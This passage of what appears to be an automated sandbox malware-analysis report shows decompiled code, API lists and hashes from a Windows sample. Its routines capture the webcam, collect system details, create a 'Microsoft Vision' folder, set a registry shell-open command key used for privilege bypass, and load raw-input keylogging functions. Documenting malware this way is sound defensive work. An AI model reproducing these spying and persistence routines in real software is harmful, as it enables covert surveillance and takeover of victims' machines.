								asm("movsd");
								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
								_t49 = E0044044E();
								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
								if(_t49 != 0) {
									_t49 = E0044046A();
									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
									if(_t49 != 0) {
										_t20 = _t76 + 0x24; // 0x0
										_t85 =  *_t20;
										_t21 = _t76 + 0x28; // 0x0
										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *_t21, _t49);
										if(_t49 >= 0) {
											_t23 = _t76 + 0x18; // 0x0
											_t60 =  *_t23;
											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
											E0043102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
											E004402B1( &_v200);
											_t107 = _a4;
											E004408F0(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
											_t35 = _t76 + 0xc; // 0x0
											E0043582B(_t76 & 0xffffff00 | _t107 -  *_t35 > 0x00000000);
											_t38 = _t76 + 4; // 0x112c88
											_t91 = 7;
											memcpy(_t121 + 0xc - 0x1c,  *( *_t38 + _t107 * 4), _t91 << 2);
											E0044039E( *_t76);
											_t49 = E0044044E();
											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
											if(_t49 != 0) {
												_t44 = _t76 + 0x18; // 0x0
												_t71 =  *_t44;
												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
												_t46 = _t76 + 0x24; // 0x0
												_t96 =  *_t46;
												_t47 = _t76 + 0x34; // 0x1209c4
												_t118 = _t47;
												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x442580, _t118);
												_t97 =  *_t118;
												if(_t97 != 0) {
													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t49;
			}
































                                      0x00440ade
                                      0x00440ae0
                                      0x00440ae6
                                      0x00440ae6
                                      0x00440af8
                                      0x00440afe
                                      0x00440b02
                                      0x00440b0a
                                      0x00440b0a
                                      0x00440b14
                                      0x00440b16
                                      0x00440b1a
                                      0x00440b23
                                      0x00440b26
                                      0x00440b26
                                      0x00440b2b
                                      0x00440b32
                                      0x00440b32
                                      0x00440b3a
                                      0x00440b40
                                      0x00440b40
                                      0x00440b52
                                      0x00440b58
                                      0x00440b5c
                                      0x00440b69
                                      0x00440b6d
                                      0x00440b70
                                      0x00440b7c
                                      0x00440b87
                                      0x00440b91
                                      0x00440b91
                                      0x00440b97
                                      0x00440b9d
                                      0x00440ba0
                                      0x00440ba1
                                      0x00440ba2
                                      0x00440bab
                                      0x00440bac
                                      0x00440bad
                                      0x00440bae
                                      0x00440bb1
                                      0x00440bb7
                                      0x00440bbc
                                      0x00440bc1
                                      0x00440bca
                                      0x00440bcf
                                      0x00440bd4
                                      0x00440bda
                                      0x00440bda
                                      0x00440bde
                                      0x00440be4
                                      0x00440be9
                                      0x00440bef
                                      0x00440bef
                                      0x00440bfc
                                      0x00440c11
                                      0x00440c1f
                                      0x00440c27
                                      0x00440c33
                                      0x00440c38
                                      0x00440c3e
                                      0x00440c43
                                      0x00440c4e
                                      0x00440c51
                                      0x00440c55
                                      0x00440c5d
                                      0x00440c62
                                      0x00440c67
                                      0x00440c69
                                      0x00440c69
                                      0x00440c73
                                      0x00440c76
                                      0x00440c76
                                      0x00440c79
                                      0x00440c79
                                      0x00440c85
                                      0x00440c87
                                      0x00440c8b
                                      0x00000000
                                      0x00440c90
                                      0x00440c8b
                                      0x00440c67
                                      0x00440be9
                                      0x00440bd4
                                      0x00440bc1
                                      0x00440b5c
                                      0x00440b3a
                                      0x00440b1a
                                      0x00440c97

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00440AE0
                                      • CoCreateInstance.OLE32(00442560,00000000,00000001,00444854,001209A8), ref: 00440AF8
                                      • CoCreateInstance.OLE32(004425B0,00000000,00000001,00444844,001209B4), ref: 00440B52
                                        • Part of subcall function 00440831: CoCreateInstance.OLE32(004425A0,00000000,00000001,00444834,?), ref: 0044085F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInstance$Initialize
                                      • String ID: Grabber$Source$vids
                                      • API String ID: 1108742289-4200688928
                                      • Opcode ID: adc9f8b96fb2596398f77022739ba8fd2f647b69e6f6934fc4722176219b013d
                                      • Instruction ID: 13f216fd7b968e1d8d38fac112b5de3fbb5572a4b90e919e19bccb472efca4d4
                                      • Opcode Fuzzy Hash: adc9f8b96fb2596398f77022739ba8fd2f647b69e6f6934fc4722176219b013d
                                      • Instruction Fuzzy Hash: 71518E71600200AFEB28DF64C895F5A3776BF49704F2145ADFE059F295CBB9E811CB94
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 00CCAC39, Relevance: 10.7, APIs: 7, Instructions: 162fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32 ref: 00CCAC7B
                                      • __fassign.LIBCMT ref: 00CCACFA
                                      • __fassign.LIBCMT ref: 00CCAD19
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CCAD46
                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00CCAD66
                                      • WriteFile.KERNEL32(?,00CCD148,00000001,?,00000000), ref: 00CCADA0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: e94a8f72bb0f9f93bb975672e29a17ca3604296bfb3da30b5064899f7d4f63ba
                                      • Instruction ID: 447500d78e8bac00f6ff09e858e0fed96f544caf7c1599f1e681e8fb0feb284f
                                      • Opcode Fuzzy Hash: e94a8f72bb0f9f93bb975672e29a17ca3604296bfb3da30b5064899f7d4f63ba
                                      • Instruction Fuzzy Hash: 95517C71A0024DAFCB10CFA8D895FEEBBF8EF09315F14416AE556E7291D7309A41CB61
                                      Uniqueness

                                      Uniqueness Score: 0.61%

                                      Function 00CC1DD0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117UNIQUE
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00CC1DFB
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00CC1E03
                                      • _ValidateLocalCookies.LIBCMT ref: 00CC1E91
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00CC1EBC
                                      • _ValidateLocalCookies.LIBCMT ref: 00CC1F11
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 855a253c167d6e5e374bdf220d3807d50bb698aca29ea0d7ee9e65d24700ca57
                                      • Instruction ID: a7b8156b0052d3f77d002d11581460435204d6961d37aa71c63d30ea3b071be9
                                      • Opcode Fuzzy Hash: 855a253c167d6e5e374bdf220d3807d50bb698aca29ea0d7ee9e65d24700ca57
                                      • Instruction Fuzzy Hash: 4441B670A002089BCF14DF5AC884FAEBBA5AF46324F18815DEC259B353D731DE05CB90
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00432B29, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107stringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 95%
                                      			E00432B29(void* __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v76;
				char _v344;
				short _v864;
				void* __edi;
				void* _t28;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t54;
				void* _t75;
				void* _t76;
				void* _t81;
				void* _t82;
				void* _t84;

				_t84 = __eflags;
				_t54 = __ecx;
				_t76 = __edx;
				E0043D7A9(E0043D8DA( &_v24, __edx),  &_v20);
				GetModuleFileNameA(0,  &_v344, 0x104);
				_v16 = 0;
				_t28 = E0043FC79( &_v344,  &_v16);
				_v12 = 0;
				E0043F9F3(_t28, _v16,  &_v12,  &_v12);
				_t82 = _t81 + 4;
				E00433412(_t82, _v20);
				E00433412(_t82, _v24);
				_t32 = E0043D9BA();
				E00433412(_t82, 0x442608);
				_t64 = _t82;
				E0043DC19(_t82);
				_t35 = E0043DBF3(_t82);
				_t36 = E0043DB97();
				_t37 = E0043D9DD();
				E0043DC53(_t82, _v16);
				E00434B53(_t54, E00433EA1( &_v76, _v16, _t84, _t82, _t64, 0xdc, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75));
				E00433E5F( &_v76, _t76);
				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
					E00431052( &_v864, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
					lstrcatW( &_v864, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v864, 0);
					E004385B6(_t54, 1);
					_v12 = 0x444970;
					E00434B53(_t54,  &_v12);
				}
				E00435A2D(_v20);
				return E00435A2D(_v24);
			}






















                                      0x00432b29
                                      0x00432b34
                                      0x00432b3a
                                      0x00432b44
                                      0x00432b58
                                      0x00432b61
                                      0x00432b6a
                                      0x00432b79
                                      0x00432b7c
                                      0x00432b84
                                      0x00432b8c
                                      0x00432b95
                                      0x00432b9a
                                      0x00432bab
                                      0x00432bb1
                                      0x00432bb3
                                      0x00432bb8
                                      0x00432bbe
                                      0x00432bc4
                                      0x00432bd3
                                      0x00432be3
                                      0x00432beb
                                      0x00432bf5
                                      0x00432c04
                                      0x00432c18
                                      0x00432c2a
                                      0x00432c38
                                      0x00432c41
                                      0x00432c49
                                      0x00432c53
                                      0x00432c53
                                      0x00432c5b
                                      0x00432c6c

                                      APIs
                                        • Part of subcall function 0043D7A9: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0043D7C0
                                        • Part of subcall function 0043D7A9: CoInitialize.OLE32(00000000), ref: 0043D7C7
                                        • Part of subcall function 0043D7A9: CoCreateInstance.OLE32(00442460,00000000,00000017,00444330,?), ref: 0043D7E5
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00432B58
                                        • Part of subcall function 0043FC79: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0043FCA6
                                        • Part of subcall function 0043FC79: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00432B6F), ref: 0043FCB1
                                        • Part of subcall function 0043FC79: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0043FCC2
                                        • Part of subcall function 0043FC79: CloseHandle.KERNEL32(00000000), ref: 0043FCC9
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 0043D9BA: GlobalMemoryStatusEx.KERNEL32(?), ref: 0043D9CB
                                        • Part of subcall function 0043DC19: GetComputerNameW.KERNEL32(00432BB8,00000010), ref: 0043DC3C
                                        • Part of subcall function 0043DBF3: GetCurrentProcess.KERNEL32(?,?,00432BBD,?,00442608,?,?,00000000,?,?,?), ref: 0043DBF7
                                        • Part of subcall function 0043DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0043DBA9
                                        • Part of subcall function 0043DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0043DBB0
                                        • Part of subcall function 0043DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0043DBCE
                                        • Part of subcall function 0043DB97: CloseHandle.KERNEL32(00000000), ref: 0043DBE3
                                        • Part of subcall function 0043D9DD: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0043D9F5
                                        • Part of subcall function 0043D9DD: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0043DA05
                                        • Part of subcall function 0043DC53: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0043DC97
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00432C18
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00432C2A
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00432C38
                                        • Part of subcall function 004385B6: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385C2
                                        • Part of subcall function 004385B6: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385D9
                                        • Part of subcall function 004385B6: EnterCriticalSection.KERNEL32(004477C8,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385E5
                                        • Part of subcall function 004385B6: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385F5
                                        • Part of subcall function 004385B6: LeaveCriticalSection.KERNEL32(004477C8,?,00000000), ref: 00438648
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalFileSection$CreateHandleInitializeProcess$CloseCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                      • String ID: \Microsoft Vision\$pID
                                      • API String ID: 1987359387-3233517829
                                      • Opcode ID: 5ae71abd75c3b45ef96c98d6367c035afc78a40b251cf21ae3880f4ae1fb508f
                                      • Instruction ID: 4f7f3de7dcd0c084939795f98f4321327fec1a2c36eb812e377a9edfc52bdedf
                                      • Opcode Fuzzy Hash: 5ae71abd75c3b45ef96c98d6367c035afc78a40b251cf21ae3880f4ae1fb508f
                                      • Instruction Fuzzy Hash: A93198B1D00518BBDB04FBA1DC46EEFB77CAF48309F40606EB115A2192DA785A45CBA9
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00CC98B6, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00CC987E: _free.LIBCMT ref: 00CC98A3
                                      • _free.LIBCMT ref: 00CC9904
                                        • Part of subcall function 00CC628A: HeapFree.KERNEL32(00000000,00000000), ref: 00CC62A0
                                        • Part of subcall function 00CC628A: GetLastError.KERNEL32(?,?,00CC98A8,?,00000000,?,00000000,?,00CC98CF,?,00000007,?,?,00CC9CD3,?,?), ref: 00CC62B2
                                      • _free.LIBCMT ref: 00CC990F
                                      • _free.LIBCMT ref: 00CC991A
                                      • _free.LIBCMT ref: 00CC996E
                                      • _free.LIBCMT ref: 00CC9979
                                      • _free.LIBCMT ref: 00CC9984
                                      • _free.LIBCMT ref: 00CC998F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp Download File
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 815bc0071f0b4a8f649899424cf45e433ae55eb76270d98698b1a9d2e1f79aa2
                                      • Instruction ID: 3c77ee450d83bef6ea3fc82a720ac5364fb7e91ba90254ed1d6c9d596ba9e45d
                                      • Opcode Fuzzy Hash: 815bc0071f0b4a8f649899424cf45e433ae55eb76270d98698b1a9d2e1f79aa2
                                      • Instruction Fuzzy Hash: B411D072544704A6D560BBB0CD4BFCB779DAF0A700F40491DF29B6B1A3DE75E504ABA0
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0043F6C1, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48registryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0043F6C1() {
				void* _v8;
				int _v12;
				int _v16;
				struct _SECURITY_DESCRIPTOR* _v20;
				struct _SECURITY_ATTRIBUTES _v24;
				struct _SECURITY_DESCRIPTOR _v44;
				long _t20;

				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
					L5:
					return 0;
				} else {
					_v24 = 0xc;
					_v20 =  &_v44;
					_v16 = 0;
					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
					if(_t20 != 0) {
						SetLastError(_t20);
						goto L5;
					}
					RegCloseKey(_v8);
					return 1;
				}
			}










                                      0x0043f6d6
                                      0x0043f738
                                      0x00000000
                                      0x0043f6ec
                                      0x0043f6ef
                                      0x0043f6f6
                                      0x0043f700
                                      0x0043f71a
                                      0x0043f722
                                      0x0043f732
                                      0x00000000
                                      0x0043f732
                                      0x0043f727
                                      0x00000000
                                      0x0043f72d

                                      APIs
                                      • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,0043F901), ref: 0043F6CE
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,0043F901), ref: 0043F6E2
                                      • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,0043F901,?), ref: 0043F71A
                                      • RegCloseKey.ADVAPI32(0043F901), ref: 0043F727
                                      • SetLastError.KERNEL32(00000000), ref: 0043F732
                                      Strings
                                      • Software\Classes\Folder\shell\open\command, xrefs: 0043F710
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                      • String ID: Software\Classes\Folder\shell\open\command
                                      • API String ID: 1473660444-2536721355
                                      • Opcode ID: 4d76812b5b12f536430042e04b28cc929e009487ea006c032678460e5f672b8e
                                      • Instruction ID: 8ceaccb331f250df422791b7480b7c88b280f99e8dc0a0a18dca9b8cd2f4666d
                                      • Opcode Fuzzy Hash: 4d76812b5b12f536430042e04b28cc929e009487ea006c032678460e5f672b8e
                                      • Instruction Fuzzy Hash: EA01DA75D01228BAEB209BA19D49EDF7FFCEF0A755F501032F905F2140D7B49645CAA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 004385B6, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004385B6(char _a4, intOrPtr _a8) {
				void _v28;
				void* _t13;
				signed int _t14;

				InitializeCriticalSection( &_v28);
				_t14 = 6;
				DeleteCriticalSection(memcpy(0x4477c8,  &_v28, _t14 << 2));
				EnterCriticalSection(0x4477c8);
				_t5 =  &_a4; // 0x432c46
				 *0x4477f0 =  *_t5;
				GetModuleHandleA(0);
				 *0x446690 = 0x446da0;
				if(_a8 == 0) {
					E00431E9A(0x447814);
					 *0x446da0 = 1;
					_t13 = E00431E6F(0x44780c, E0043822F, 0x446da0);
				} else {
					_t13 = E00431E6F(0x447814, E004374B4, 0x446da0);
					 *0x4477b4 = 1;
				}
				LeaveCriticalSection(0x4477c8);
				return _t13;
			}






                                      0x004385c2
                                      0x004385ca
                                      0x004385d9
                                      0x004385e5
                                      0x004385eb
                                      0x004385f0
                                      0x004385f5
                                      0x00438604
                                      0x0043860f
                                      0x00438628
                                      0x00438638
                                      0x00438642
                                      0x00438611
                                      0x00438617
                                      0x0043861c
                                      0x0043861c
                                      0x00438648
                                      0x00438651

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385C2
                                      • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385D9
                                      • EnterCriticalSection.KERNEL32(004477C8,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385E5
                                      • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385F5
                                      • LeaveCriticalSection.KERNEL32(004477C8,?,00000000), ref: 00438648
                                        • Part of subcall function 00431E6F: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00431E84
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                      • String ID: F,C
                                      • API String ID: 2964645253-1571967972
                                      • Opcode ID: 30f0c2512a4dcc3e4af5c0b8373fa1bb9b92f09ca8d69666a983d5141bf25c19
                                      • Instruction ID: ff2affabda82d1d304edac901e9d035713468b44fc76b3976835f8fbc6f32bd8
                                      • Opcode Fuzzy Hash: 30f0c2512a4dcc3e4af5c0b8373fa1bb9b92f09ca8d69666a983d5141bf25c19
                                      • Instruction Fuzzy Hash: 7E01D475904204ABEB00AF51AC0FA9F3F69EB8A715F81402BFA0557260CBBD5406CBAD
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00438654, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38libraryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E00438654() {
				intOrPtr _t1;

				_t1 = 5;
				 *0x4477c4 = _t1;
				 *0x446dac = 0;
				 *0x4477bc = _t1;
				 *0x4477c0 = 0;
				E00431815(0x4477b8, 0);
				InitializeCriticalSection(0x4477c8);
				E0043DE6C(0x4477f4, 0);
				asm("xorps xmm0, xmm0");
				 *0x4477e0 = 0;
				asm("movups [0x44780c], xmm0");
				 *0x4477f0 = 0;
				_t19 = LoadLibraryW(L"User32.dll");
				_push(0x4477f4);
				 *0x4477e4 = E0043E907(_t4, "GetRawInputData", 0);
				 *0x4477ec = E0043E907(_t19, "ToUnicode", 0);
				 *0x4477e8 = E0043E907(_t19, "MapVirtualKeyA", 0);
				return 0x446da0;
			}




                                      0x00438657
                                      0x0043865a
                                      0x00438664
                                      0x0043866a
                                      0x0043866f
                                      0x00438675
                                      0x0043867f
                                      0x0043868a
                                      0x0043868f
                                      0x00438692
                                      0x0043869d
                                      0x004386a4
                                      0x004386b0
                                      0x004386b7
                                      0x004386c4
                                      0x004386d5
                                      0x004386e2
                                      0x004386ed

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(004477C8,?,004311C1), ref: 0043867F
                                      • LoadLibraryW.KERNEL32(User32.dll), ref: 004386AA
                                        • Part of subcall function 0043E907: lstrcmpA.KERNEL32(?,0043F9CB,?,open,0043F9CB), ref: 0043E940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
